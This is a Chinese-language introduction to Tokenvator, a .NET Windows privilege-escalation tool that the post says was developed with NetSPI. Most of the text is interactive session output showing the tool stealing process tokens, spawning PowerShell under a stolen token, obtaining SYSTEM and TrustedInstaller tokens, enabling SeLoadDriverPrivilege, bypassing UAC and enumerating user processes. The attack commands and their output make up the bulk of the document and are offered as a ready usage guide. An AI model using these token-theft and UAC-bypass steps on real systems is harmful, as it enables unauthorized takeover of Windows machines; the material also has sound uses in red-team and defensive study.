今天给大家介绍的是一款名叫Tokenvator的工具,该工具采用.NET开发,可用于在Windows系统中提权。
下载地址:【GitHub传送门】
基本使用Tokenvator可以直接在交互式终端中运行,具体的执行命令能够以命令行参数的形式提供。在交互模式下,可以用tab键补全命令,或双击tab键获取帮助信息。
C:\Users\badjuju>Tokenvator.exe (Tokens)> help Name Optional Required ---- -------- -------- GetSystem Command - GetTrustedInstaller Command - Steal_Token Command ProcessID BypassUAC ProcessID Command List_Privileges ProcessID - Set_Privilege ProcessID Privilege List_Processes - - List_Processes_WMI - - Find_User_Processes - User Find_User_Processes_WMI - User List_User_Sessions - - WhoAmI - - RevertToSelf - - Run - Command (Tokens)> WhoAmI Name Optional Required ---- -------- -------- WhoAmI - - (Tokens)> WhoAmI [*]Operating as LAB\badjuju下面大部分截图显示的是在交互模式下的命令运行情况:
从最基本的功能来说,Tokenvator可以用来访问并修改Windows认证令牌,为了获取到特定进程的令牌,我们需要结合目标进程的PID来运行Steal_Token命令。
(Tokens)> Steal_Token Name Optional Required ---- -------- -------- Steal_Token Command ProcessID (Tokens)> Steal_Token 7384 [*]Adjusting Token Privilege [+]Received luid [*]AdjustTokenPrivilege [+]Adjusted Token to: SeDebugPrivilege [*]Impersonating 7384 [+]Recieved Handle for: (7384) [+]Process Handle: 824 [+]Primary Token Handle: 828 [+]Duplicate Token Handle: 824 (Tokens)> whoami [*]Operating as lab\backup #p#分页标题#e#或者我们也可以添加额外的命令选项来使用新的访问令牌。
(Tokens)> Steal_Token 7384 powershell.exe [*]Adjusting Token Privilege [+]Received luid [*]AdjustTokenPrivilege [+]Adjusted Token to: SeDebugPrivilege [+]Recieved Handle for: (7384) [+]Process Handle: 860 [+]Primary Token Handle: 864 [+]Duplicate Token Handle: 860 [*]CreateProcessWithTokenW [+]Created process: 14524 [+]Created thread: 18784 WindowsPowerShell Copyright(C) Microsoft Corporation. All rights reserved. PSC:\WINDOWS\system32> whoami lab\backup PSC:\WINDOWS\system32> $pid 14524 GetSystem一般来说,我们经常需要窃取的就是NT AUTHORITY\SYSTEM账号,而GetSystem命令可以帮助我们自动搜索并访问SYSTEM令牌。它的使用语句跟Steal_Token的类似:
(Tokens)> GetSystem [*]Adjusting Token Privilege [+]Received luid [*]AdjustTokenPrivilege [+]Adjusted Token to: SeDebugPrivilege [*]Searching for NT AUTHORITY\SYSTEM [*]Examining 344 processes [*]Discovered 118 processes [*]Impersonating 5488 [+]Recieved Handle for: (5488) [+]Process Handle: 888 [*]Impersonating 4444 [+]Recieved Handle for: (4444) [+]Process Handle: 868 [+]Primary Token Handle: 904 [+]Duplicate Token Handle: 868 (Tokens)> WhoAmI [*]Operating as NT AUTHORITY\SYSTEM (Tokens)> RevertToSelf [*]Reverted token to lab\badjuju
在某些情况下,如果没有提升到SYSTEM权限的话,我们可能无法直接访问到特定进程的令牌,比如说NT SERVICE账号(本地SQL服务进程)。
还有一种常见情况,就是SYSTEM32目录或部分注册表内容属于TRUSTEDINSTALLER组,为了修改这些位置的数据,我们要么拿到数据的拥有权,要么拿到TRUSTEDINSTALLER组成员的访问令牌。跟GetSystem类似,GetTrustedInstaller也是一个Steal_Token的封装其,它可以开启TrustedInstaller服务并获取到相应的令牌。
有的时候,我们的进程不一定拥有所要完成任务必备的权限。比如说,为了访问一个当前用户无法访问的进程,我们就需要SeDebugPrivilege 的帮助了。下面显示的是在一个高度完整的进程中对令牌的切分(UAC Elevated – TokenElevationTypeFull)。
接下来,我们尝试以管理员身份来运行notepad.exe,并查看其访问令牌:
测试完notepad.exe的令牌之后,我们可以尝试增加SeLoadDriverPrivilege来看看会发生什么。注意:权限名称是大小写敏感的。
#p#分页标题#e#
很明显,notepad.exe可以加载一个驱动器了,而且能做的还有更多,我们之后还会增加权限移除的功能,敬请期待。
UAC绕过实现UAC绕过的方法有很多种,但最有趣的一种就是修改令牌了。FuzzySecurity在利用Windows令牌实现UAC绕过方面做过很多研究,感兴趣的同学可以查看其GitHub代码库【传送门】,Tokenvator也包含了FuzzySecurity所实现的技术。在下面的测试中,我们位提权的令牌可以用来访问当前用户拥有的特权进程,并生成特权Shell。
这种方法以后很可能也不会被修复,因为这更像是一种功能。
查找用户进程首先,我们需要查看系统注册的会话信息:
(Tokens)> List_User_Sessions User SessionID ---- --------- 0 badjuju 1 backup 2下面是List_Processes命令所实现的东西,即获取用户进程的概览:
(Tokens)> List_Processes User ProcessID Process Name ---- ---------- ------------ lab\badjuju 4000List_Processes利用的是主机的原生API,在列举进程和用户方面速度非常快。由于在某些情况下如果没有实现提权的话,某些功能还是无法正常运行的,因此List_Processes_WMI便应运而生。很明显,它的功能是通过WMI实现的,所以它的速度肯定没有List_Processes快,但是它可以在非提权场景下正常运行。
(Tokens)> List_Processes_WMI [*]Examining 102 processes User ProcessID Process Name ---- ---------- ------------ \ 0 Idle LAB\BADJUJU 448 taskhost LOCAL\0XBADJUJU 1568 #p#分页标题#e#我们还可以直接列举出特定用户场景下所有运行的进程信息:
(Tokens)> Find_User_Processes WINDOWS7ENTERPR\BADJUJU [*]Examining 100 processes [*]Discovered 29 processes ProcessID Process Name ---------- ------------ 3268 calc 3520 cmd 2604 cmd 4000 conhost 4664 conhost 920 conhost 1972 conhost 4928 conhost 2760 conhost 656 dwm 1776 explorer 5048 msvsmon 5352 msvsmon 3412 notepad 3552 powershell 3116 powershell_ise 2464 rdpclip 4820 rundotnetdll32 3944 taskhost 448 taskhost 3424 Tokenvator 4892 VCSExpress跟List_Processes机制类似,它也能够在非特权场景下通过WMI完成相同的工作:
(Tokens)> Find_User_Processes_WMI LOCAL\0xBADJUJU [*]Examining 102 processes [*]Discovered 31 processes ProcessID Process Name ---------- ------------ 1568 cmd.exe 2108 conhost.exe 1936 procexp64.exe 3544 cmd.exe 3608 conhost.exe 3892 x64dbg.exe 总结这款工具是我跟NetSPI团队共同开发的,希望能给大家提供帮助,如果大家在使用过程中发现了问题的话,可以在GitHub上留言。
